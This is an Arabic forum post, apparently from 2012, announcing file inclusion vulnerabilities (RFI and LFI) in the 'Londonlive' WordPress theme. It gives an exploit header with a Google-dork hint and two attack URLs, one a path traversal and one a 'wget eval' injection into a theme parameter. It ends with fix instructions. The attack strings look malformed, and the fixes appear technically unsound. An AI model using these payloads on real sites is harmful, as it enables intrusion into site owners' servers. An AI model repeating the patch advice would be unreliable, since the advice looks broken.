السلام عليكم ورحمة الله تعالى وبركاته :-


كيفكم شباب , ان شاء الله بخير

قمت بي اكتشاف ثغرة RFi & LFi في قالب لي الورد برس Londonlive المعرب تفضلو الثغرة مع الترقيع :


كود:
# Exploit Title: Wordpress themes (Londonlive)====> RFI & LFI 
# Google Dork: you do it :P
# Date: 2012/5/31
# Author: ACe 
# Version: v1.2
# Tested on: win 7
# email:[email protected]
# greetings to : pSyCh0_3D , Fontom 



#RFI exploit#

http://localhost/wp-content/themes/Londonlive/functions.php?local_file= wget eval





#LFI exploit#


http://localhost/wp-content/themes/Londonlive/scripts/functions/admin_panel_functions.php?page.=../index





#how to fix LFI exploit #

search for ($page.) and replace with ('../../..';) in /scripts/functions/admin_panel_functions.php then save.


#how to fix RFI exploit #

go to /themes/Londonlive/ and open functions.php and define the variable ($local_file) like this 


$local_file="./";





#thinks god for makeing me stronger :)